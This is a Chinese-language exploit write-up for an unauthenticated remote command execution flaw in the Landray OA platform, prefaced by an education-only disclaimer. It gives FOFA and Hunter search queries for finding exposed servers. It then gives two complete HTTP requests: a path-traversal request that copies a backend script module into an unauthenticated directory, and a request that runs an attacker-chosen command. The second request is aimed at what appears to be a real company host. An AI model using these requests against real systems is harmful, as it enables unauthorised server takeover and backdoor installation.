声明：本文档或演示材料仅供教育和教学目的使用，任何个人或组织使用本文档中的信息进行非法活动，均与本文档的作者或发布者无关。

漏洞描述

蓝凌OA平台，数字化向纵深发展，正加速构建产业互联网，对企业协作能力提出更高要求，蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化，赋能大中型组织的内外协作与管理，支撑商业模式创新与转型发展。由于蓝凌OA代码功能模块设计缺陷问题，攻击者可以利用文件复制的方式，将后台脚本功能模块文件复制到无需权限认证的目录下，导致未经过身份认证的攻击者利用后台脚本执行模块，远程命令执行，写入后门文件并获取服务器权限。

漏洞复现

1）信息收集
fofa：app="Landray-OA系统"
hunter：app.name="Landray 蓝凌OA"

我们永远无法叫醒一个装睡的人 。

2）构造数据包

POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host: ip
Accept:application/json,text/javascript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
X-Requested-With:XMLHttpRequest
Content-Length: 395

------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="method"

replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="extendId"

../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="folderName"

../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--

POST /resource/help/km/review/dataxml.jsp HTTP/1.1
Host: cfoa.cfpharmtech.com:9081
User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36
Connection:close
Content-Length:17392
Content-Type:application/x-www-form-urlencoded

s_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test

将shell替换成命令即可